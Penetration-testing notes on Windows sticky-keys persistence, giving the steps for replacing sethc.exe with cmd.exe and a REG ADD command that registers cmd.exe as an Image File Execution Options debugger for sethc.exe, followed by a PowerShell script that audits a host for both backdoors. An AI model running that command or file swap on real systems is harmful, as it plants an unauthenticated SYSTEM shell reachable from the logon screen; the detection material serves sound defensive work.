02-Persistence, 02-Kiosk Break Out

Copying sethc.exe

Once you already have administrative access, you can install sticky-keys-based persistence by doing the following:

  • Make a backup copy of the original sethc.exe
  • Copy cmd.exe to C:\Windows\System32\sethc.exe
  • Reboot and hit Shift five times!

Registry Key

Another method is to register a debugger for sethc.exe under Image File Execution Options, so that Windows launches cmd.exe in its place, by running the following command:

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

  • If you use sticky keys for persistence, any user can hit Shift five times and get a command prompt running as SYSTEM. BE CAREFUL!!! You shouldn't introduce risks to your clients
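Both methods above leave the same two artifacts behind, which is what a defender (or a tester cleaning up after an engagement) should check for. The following script is an added example, not part of the original notes: it audits a host for an IFEO Debugger value on the accessibility binaries and for a binary whose contents no longer match its name. Extending the sethc.exe case to the other accessibility tools started from the logon screen, and using the file's embedded OriginalFilename as the swap heuristic, are this example's own assumptions.

```powershell
# Added example (not from the original notes): audit a Windows host for the two
# sticky-keys persistence methods described above. Run from an elevated
# PowerShell prompt. The list of accessibility binaries beyond sethc.exe and
# the OriginalFilename heuristic are assumptions made for this example.

function Test-AccessibilityBackdoor {
    param(
        # Accessibility binaries Windows will run before anyone logs on.
        [string[]] $Binaries = @('sethc.exe', 'utilman.exe', 'osk.exe',
                                 'narrator.exe', 'magnify.exe',
                                 'displayswitch.exe', 'atbroker.exe')
    )

    $ifeoRoot = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
    $findings = @()

    foreach ($bin in $Binaries) {
        # Method 2 from the notes: an IFEO "Debugger" value makes Windows start
        # the named program in place of the accessibility tool.
        $keyPath = Join-Path $ifeoRoot $bin
        if (Test-Path -LiteralPath $keyPath) {
            $debugger = (Get-ItemProperty -LiteralPath $keyPath -ErrorAction SilentlyContinue).Debugger
            if ($debugger) {
                $findings += [pscustomobject]@{
                    Binary = $bin
                    Check  = 'IFEO Debugger value set'
                    Detail = $debugger
                }
            }
        }

        # Method 1 from the notes: the tool's file overwritten with cmd.exe.
        # A copied cmd.exe is still a catalog-signed Microsoft binary, so a
        # signature check alone will not catch it; compare the embedded
        # OriginalFilename with the name the file is posing under.
        $filePath = Join-Path $env:SystemRoot ('System32\' + $bin)
        if (-not (Test-Path -LiteralPath $filePath)) { continue }

        $original = (Get-Item -LiteralPath $filePath).VersionInfo.OriginalFilename
        if ($original -and ($original -ne $bin)) {   # -ne is case-insensitive
            $findings += [pscustomobject]@{
                Binary = $bin
                Check  = 'File content does not match its name'
                Detail = "OriginalFilename = $original"
            }
        }

        # Anything without a valid signature is also worth a look; this covers
        # replacements that are not Microsoft binaries at all.
        $sig = Get-AuthenticodeSignature -LiteralPath $filePath
        if ($sig.Status -ne 'Valid') {
            $findings += [pscustomobject]@{
                Binary = $bin
                Check  = 'Signature not valid'
                Detail = $sig.Status
            }
        }
    }

    return $findings
}

$results = @(Test-AccessibilityBackdoor)
if ($results.Count -eq 0) {
    'No sticky-keys style persistence indicators found.'
} else {
    $results | Format-Table -AutoSize
}
```

The OriginalFilename comparison is a heuristic, so treat a hit as something to inspect rather than proof on its own; `sfc /verifyonly` gives an independent check of the System32 copies against the component store. The IFEO key is also a good place to alert on registry value-set events (Sysmon Event ID 13) since legitimate software rarely registers a debugger for an accessibility tool.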
